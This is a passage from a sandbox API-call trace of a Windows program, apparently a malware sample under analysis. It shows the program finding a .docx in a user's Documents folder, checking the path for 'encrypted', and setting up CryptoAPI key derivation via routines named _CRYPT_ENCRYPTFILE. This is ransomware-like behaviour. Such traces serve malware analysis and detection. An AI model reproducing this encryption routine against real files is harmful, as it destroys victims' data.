lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0036.889] FreeLibrary (hLibModule=0x76e10000) returned 1 [0036.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0036.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0036.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0036.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0036.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0036.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0036.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0036.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0036.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0036.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0036.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0036.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0036.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0036.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0036.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0036.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0036.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0036.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0036.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0036.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0036.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0036.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0036.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0036.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0036.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0036.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0036.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0036.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0036.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0036.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0036.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0036.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0036.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0036.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0036.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0036.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0036.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0036.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0036.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0036.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0036.890] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0036.890] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0036.890] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0036.890] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0036.890] FreeLibrary (hLibModule=0x76e10000) returned 1 [0036.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0036.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0036.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0036.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0036.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0036.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0036.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0036.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0036.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0036.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0036.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0036.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0036.891] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0036.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0036.891] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0036.891] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0036.891] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.891] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0036.891] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0036.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="docx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".docx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0036.891] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.891] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.891] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.891] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\XTFgSi8S58kpp1FfY.docx", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x410244d0, ftCreationTime.dwHighDateTime=0x1d5ba52, ftLastAccessTime.dwLowDateTime=0x2bd81670, ftLastAccessTime.dwHighDateTime=0x1d54c89, ftLastWriteTime.dwLowDateTime=0x2bd81670, ftLastWriteTime.dwHighDateTime=0x1d54c89, nFileSizeHigh=0x0, nFileSizeLow=0x793e, dwReserved0=0x0, dwReserved1=0x777648, cFileName="XTFgSi8S58kpp1FfY.docx", cAlternateFileName="XTFGSI~1.DOC")) returned 0x7c20c0 [0036.891] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0036.892] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.892] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\XTFgSi8S58kpp1FfY.docx", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x410244d0, ftCreationTime.dwHighDateTime=0x1d5ba52, ftLastAccessTime.dwLowDateTime=0x2bd81670, ftLastAccessTime.dwHighDateTime=0x1d54c89, ftLastWriteTime.dwLowDateTime=0x2bd81670, ftLastWriteTime.dwHighDateTime=0x1d54c89, nFileSizeHigh=0x0, nFileSizeLow=0x793e, dwReserved0=0x0, dwReserved1=0x777648, cFileName="XTFgSi8S58kpp1FfY.docx", cAlternateFileName="XTFGSI~1.DOC")) returned 0x7c20c0 [0036.892] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0036.892] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.892] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\XTFgSi8S58kpp1FfY.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.892] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\XTFgSi8S58kpp1FfY.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.892] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\XTFgSi8S58kpp1FfY.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.892] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\XTFgSi8S58kpp1FfY.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.892] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\XTFgSi8S58kpp1FfY.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.892] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\XTFgSi8S58kpp1FfY.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.892] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\XTFgSi8S58kpp1FfY.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.892] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\XTFgSi8S58kpp1FfY.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.892] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\XTFgSi8S58kpp1FfY.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.892] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\XTFgSi8S58kpp1FfY.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.892] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\XTFgSi8S58kpp1FfY.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.892] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\XTFgSi8S58kpp1FfY.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.892] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\XTFgSi8S58kpp1FfY.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.892] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\XTFgSi8S58kpp1FfY.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.892] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\XTFgSi8S58kpp1FfY.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.892] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\XTFgSi8S58kpp1FfY.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.892] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\XTFgSi8S58kpp1FfY.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.892] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\XTFgSi8S58kpp1FfY.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.892] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\XTFgSi8S58kpp1FfY.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.892] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\XTFgSi8S58kpp1FfY.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.892] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\XTFgSi8S58kpp1FfY.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.893] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\XTFgSi8S58kpp1FfY.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.893] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\XTFgSi8S58kpp1FfY.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.893] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\XTFgSi8S58kpp1FfY.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.893] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\XTFgSi8S58kpp1FfY.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.893] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\XTFgSi8S58kpp1FfY.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.893] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\XTFgSi8S58kpp1FfY.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.893] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\XTFgSi8S58kpp1FfY.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.893] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\XTFgSi8S58kpp1FfY.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.893] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\XTFgSi8S58kpp1FfY.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.893] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\XTFgSi8S58kpp1FfY.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.893] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\XTFgSi8S58kpp1FfY.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.893] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\XTFgSi8S58kpp1FfY.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.893] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\XTFgSi8S58kpp1FfY.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.893] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\XTFgSi8S58kpp1FfY.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.893] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\XTFgSi8S58kpp1FfY.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.893] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\XTFgSi8S58kpp1FfY.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.893] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\XTFgSi8S58kpp1FfY.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.893] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\XTFgSi8S58kpp1FfY.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.893] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\XTFgSi8S58kpp1FfY.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.893] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\XTFgSi8S58kpp1FfY.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.893] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XTFgSi8S58kpp1FfY.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.893] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TFgSi8S58kpp1FfY.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.893] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FgSi8S58kpp1FfY.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.893] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gSi8S58kpp1FfY.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.893] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Si8S58kpp1FfY.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.893] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i8S58kpp1FfY.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.893] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8S58kpp1FfY.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.893] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S58kpp1FfY.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.893] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="58kpp1FfY.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.893] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8kpp1FfY.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.893] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kpp1FfY.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.893] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pp1FfY.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.893] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p1FfY.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1FfY.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FfY.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.894] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.894] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0036.894] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0036.894] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0036.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="docx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".docx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0036.894] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0036.894] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0036.894] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0036.894] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0036.894] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.894] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\XTFgSi8S58kpp1FfY.docx", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x410244d0, ftCreationTime.dwHighDateTime=0x1d5ba52, ftLastAccessTime.dwLowDateTime=0x2bd81670, ftLastAccessTime.dwHighDateTime=0x1d54c89, ftLastWriteTime.dwLowDateTime=0x2bd81670, ftLastWriteTime.dwHighDateTime=0x1d54c89, nFileSizeHigh=0x0, nFileSizeLow=0x793e, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="XTFgSi8S58kpp1FfY.docx", cAlternateFileName="XTFGSI~1.DOC")) returned 0x7c2240 [0036.894] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0036.895] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.895] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0036.895] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.895] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0036.895] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0036.895] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.895] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0036.895] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.895] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.895] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0036.895] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.895] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.895] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5bb8) returned 1 [0036.896] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0036.896] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0036.896] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0036.896] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0036.896] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") 